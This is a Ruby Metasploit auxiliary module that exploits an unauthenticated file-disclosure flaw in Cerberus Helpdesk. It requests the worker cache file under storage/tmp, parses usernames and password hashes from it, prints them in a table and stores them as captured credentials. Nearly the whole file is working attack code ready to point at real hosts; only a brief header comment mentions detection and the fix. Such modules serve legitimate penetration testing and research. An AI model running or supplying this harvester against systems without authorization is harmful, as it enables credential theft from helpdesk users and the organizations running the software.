Path: blob/master/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner that reads the Cerberus Helpdesk worker cache file
# (`storage/tmp/<site>_cache---ch_workers`) over plain HTTP and reports the
# usernames and password hashes it contains. Defenders can detect probes for
# this path in web server logs; the underlying fix is to deny web access to
# the `storage/tmp` directory.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Registers module metadata and the single TARGETURI option (helpdesk root, default '/').
  def initialize
    super(
      'Name' => 'Cerberus Helpdesk User Hash Disclosure',
      'Description' => %q{
        This module extracts usernames and password hashes from the Cerberus Helpdesk
        through an unauthenticated access to a workers file.
        Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
      },
      'References' => [
        [ 'EDB', '39526' ]
      ],
      'Author' => [
        'asdizzle_', # discovery
        'h00die', # module
      ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Mar 7 2016'
    )

    register_options(
      [
        OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
      ]
    )
  end

  # Scanner entry point, invoked once per host.
  #
  # Tries the 'devblocks' and 'zend' cache-file variants in turn; the first
  # response whose body mentions 'pass' is parsed, every extracted pair is
  # stored via store_valid_credential as a non-replayable hash and printed as a
  # table, and no further variants are tried. Hosts that do not answer, or
  # answer with an unexpected body, are reported with print_error and skipped.
  # A ::Rex::ConnectionError aborts the host after logging it.
  #
  # @param rhost [String] target host (unused directly; HttpClient reads the datastore)
  # @return [nil]
  def run_host(rhost)
    %w[devblocks zend].each do |cache_variant|
      cache_url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{cache_variant}_cache---ch_workers")
      vprint_status("Attempting to load data from #{cache_url}")

      res = send_request_cgi({ 'uri' => cache_url })
      unless res
        print_error("#{peer} Unable to connect to #{cache_url}")
        next
      end

      unless res.body.include?('pass')
        print_error("Invalid response received for #{peer} for #{cache_url}")
        next
      end

      cred_table = Rex::Text::Table.new(
        'Header' => 'Cerberus Helpdesk User Credentials',
        'Indent' => 1,
        'Columns' => ['Username', 'Password Hash']
      )

      # The body is a serialized-looking blob whose exact format is unknown, so
      # the fields are pulled out by position: split on 's:5', keep the records
      # that mention 'email', then take the 4th and 8th colon-separated fields
      # (equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g').
      res.body.split('s:5').each do |record|
        next unless record.include?('email')

        fields = record.split(':')
        # strip the quoting/terminator characters; the username also carries a trailing 's'
        username = fields[3].tr('";', '')[0...-1]
        password_hash = fields[7].tr('";', '')

        print_good("Found: #{username}:#{password_hash}")
        store_valid_credential(
          user: username,
          private: password_hash,
          private_type: :nonreplayable_hash
        )
        cred_table << [username, password_hash]
      end

      print_line
      print_line cred_table.to_s
      break # one successful variant is enough for this host
    end
  rescue ::Rex::ConnectionError
    print_error("#{peer} Unable to connect to site")
  end
end